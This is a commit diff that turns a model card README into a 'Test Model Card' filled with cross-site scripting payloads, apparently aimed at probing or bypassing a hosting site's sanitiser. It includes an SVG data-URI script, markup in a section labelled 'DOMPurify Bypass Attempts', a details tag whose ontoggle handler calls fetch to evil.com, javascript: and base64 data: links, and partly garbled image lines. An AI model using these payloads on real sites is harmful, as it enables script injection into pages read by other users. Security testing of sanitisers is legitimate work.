update model card
Browse files
README.md
CHANGED
|
@@ -1 +1,26 @@
|
|
| 1 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: mit
|
| 3 |
+
---
|
| 4 |
+
|
| 5 |
+
# Test Model Card
|
| 6 |
+
|
| 7 |
+
## SVG Test
|
| 8 |
+
<div>
|
| 9 |
+
<svg><use href='data:image/svg+xml,<svg id="x" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><foreignObject width="100%" height="100%"><div xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></div></foreignObject></svg>#x'></use></svg>
|
| 10 |
+
</div>
|
| 11 |
+
|
| 12 |
+
## DOMPurify Bypass Attempts
|
| 13 |
+
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="x"></style><img onerror=alert(1) src></mtext></svg></mglyph></form></math></mtext></form>
|
| 14 |
+
|
| 15 |
+
## Details Tag
|
| 16 |
+
<details open ontoggle=fetch('https://evil.com')><summary>test</summary>hello</details>
|
| 17 |
+
|
| 18 |
+
## Link
|
| 19 |
+
[Click me](javascript:alert(1))
|
| 20 |
+
[Click me2](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)
|
| 21 |
+
|
| 22 |
+
## Image with handler
|
| 23 |
+
)
|
| 24 |
+
|
| 25 |
+
## Markdown Image
|
| 26 |
+

|